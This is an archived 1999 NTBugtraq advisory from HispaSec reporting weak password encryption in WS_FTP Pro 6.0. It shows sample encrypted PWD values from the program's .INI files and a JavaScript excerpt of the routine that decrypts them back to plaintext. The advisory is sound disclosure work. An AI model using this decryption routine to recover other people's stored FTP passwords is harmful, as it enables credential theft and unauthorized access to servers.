'WS_FTP Pro 6.0 Weak Password Encryption Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       ntbugtraq
Subject:    WS_FTP Pro 6.0 Weak Password Encryption Vulnerability
From:       Bernardo Quintero <bernardo () HISPASEC ! COM>
Date:       1999-07-29 11:09:22
[Download RAW message or body]

WS_FTP Pro lets you configure FTP sites so that you can to
save the password. WS_FTP passwords are encrypted and
stored in .INI files, example:

C:\Program Files\WS_FTP Pro\original.ini

[HISPASEC]
HOST=ftp.server.com
UID=prueba
TIMEOFFSET=0
FIREWALL=0
PASVMODE=0
AMODE=0
CONVEXT=0
FORCLOW=0
PROMPT=0
HASH=1
MODE=73
RETAIN=1
VRFYDEL=1
PWD=V99728E7229A0B92D08CD74092DAE99BCA1A3ACA59D7DA29C

others:

Password Example1: aaaaa
Encrypted Password: PWD=VDED00FCA4CC412E95C835119F5639D9E6567679495
Password Example2: aaaaa
Encrypted Password: PWD=V9531EA5D4BA4D755B85141767D3F98519A9796956A
Password Example3: aaaaaaaaaa
Encrypted Password: PWD=V48D2FBED3895FC3552495CD76F115E61959A67966B686C6C9CA2

The encryption algorithm used is weak, demo online (JavaScript):
http://www.hispasec.com/wsftp.asp

Main routine:
[...]
passw=str.substring(37,str.length);
for (var i = 0; i<passw.length/2; i++)


   var caracter=passw.substring(i*2,i*2+2);
   var sal=str.substring(5+i,6+i);
   var claro=parseInt("0x"+caracter) -i -1 - ((47+parseInt("0x"+sal))%57);

document.forms[0].text2.value=document.forms[0].text2.value+String.fromCharCode(
claro);
[...]


Jon Kadilak, Technical Support Engineer Ipswitch Inc. (http://www.ipswitch.com):
"I will put a request out for stronger encryption in the next version of WS_FTP"

Decrypt password on ini file in old versions of the WS_FTP:
http://www.securityfocus.com/templates/archive.pike?list=1&
msg=Pine.BSI.3.96.970811060019.8471B-100000@students.itb.ac.id

Advisory HispaSec:
HispaSec Security Lab discover the encryption system of WS_FTP
(en Español - eÑe Power ;) http://www.hispasec.com/unaaldia.asp?id=274


Bernardo Quintero
bernardo@hispasec.com
-----------------------
 Primer Diario Hispano
 Seguridad Informática
http://www.hispasec.com
-----------------------

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic